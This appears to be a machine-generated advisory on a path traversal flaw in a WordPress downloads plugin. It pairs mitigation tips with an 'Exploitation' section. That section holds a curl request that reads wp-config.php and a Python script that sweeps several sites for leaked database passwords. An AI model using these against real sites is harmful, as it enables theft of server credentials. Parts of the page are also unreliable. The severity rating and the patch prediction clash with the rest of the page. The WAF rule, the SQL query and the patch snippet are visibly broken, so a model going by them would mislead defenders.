Listen to this Post
How CVE-2025-2048 Works
The Lana Downloads Manager plugin (before v1.10.0) fails to sanitize user-controlled input in file download requests. Admin-level attackers can manipulate the `file` parameter to traverse directories (e.g., ../../wp-config.php
), exposing sensitive server files. The vulnerability stems from insecure `file_get_contents()` usage without path normalization checks, allowing arbitrary file read via crafted HTTP requests like:
/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../../etc/passwd
DailyCVE Form
Platform: WordPress
Version: <1.10.0
Vulnerability: Path Traversal
Severity: Critical
Date: 2025-04-01
Prediction: Patch expected by 2025-07-15
What Undercode Say:
Exploitation
1. Craft malicious request:
curl -X GET "http://victimsite.com/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php" -H "Cookie: admin_session=VALID_SESSION"
2. Automated scanning:
import requests targets = ["site1.com", "site2.com"] for site in targets: r = requests.get(f"https://{site}/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php") if "DB_PASSWORD" in r.text: print(f"Vulnerable: {site}")
Protection
1. Immediate mitigation:
// Patch snippet for lana-downloads-manager.php $allowed_path = realpath(LANA_DOWNLOADS_PATH); $requested_file = realpath($allowed_path . $_GET['file']); if (strpos($requested_file, $allowed_path) !== 0) { die("Invalid file path"); }
2. WAF rule:
location ~ /wp-admin/admin-ajax.php { if ($args ~ "file=...") { return 403; } }
3. Post-exploit detection:
SELECT FROM wp_options WHERE option_name LIKE '%lana_downloads%' AND option_value LIKE '%..%';
4. Upgrade command:
wp plugin update lana-downloads-manager --version=1.10.0
5. Intrusion check:
grep -r "lana_downloads_manager" /var/log/apache2/access.log | grep -q "../" && echo "Exploit attempt detected"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode